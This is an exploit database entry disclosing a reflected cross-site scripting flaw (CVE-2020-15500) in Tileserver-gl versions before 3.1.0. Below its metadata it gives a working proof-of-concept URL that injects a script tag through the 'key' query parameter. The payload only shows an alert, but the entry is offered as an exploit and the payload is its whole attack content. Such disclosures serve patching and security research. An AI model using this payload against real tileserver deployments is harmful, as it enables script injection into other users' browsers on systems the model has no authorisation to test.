Tileserver-gl 3.0.0 - 'key' Reflected Cross-Site Scripting (XSS)

Author: Akash Chathoth
type: webapps
platform: multiple
port: 
date_added: 2021-04-15 
date_updated: 2021-04-15 
verified: 0 
codes: CVE-2020-15500 
tags: 
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: Tileserver-gl 3.0.0 - 'key' Reflected Cross-Site Scripting (XSS)
# Date: 15/04/2021
# Exploit Author: Akash Chathoth
# Vendor Homepage: http://tileserver.org/
# Software Link: https://github.com/maptiler/tileserver-gl
# Version: versions <3.1.0
# Tested on: 2.6.0
# CVE: 2020-15500

Exploit : http://example.com/?key="><script>alert(document.domain)</script>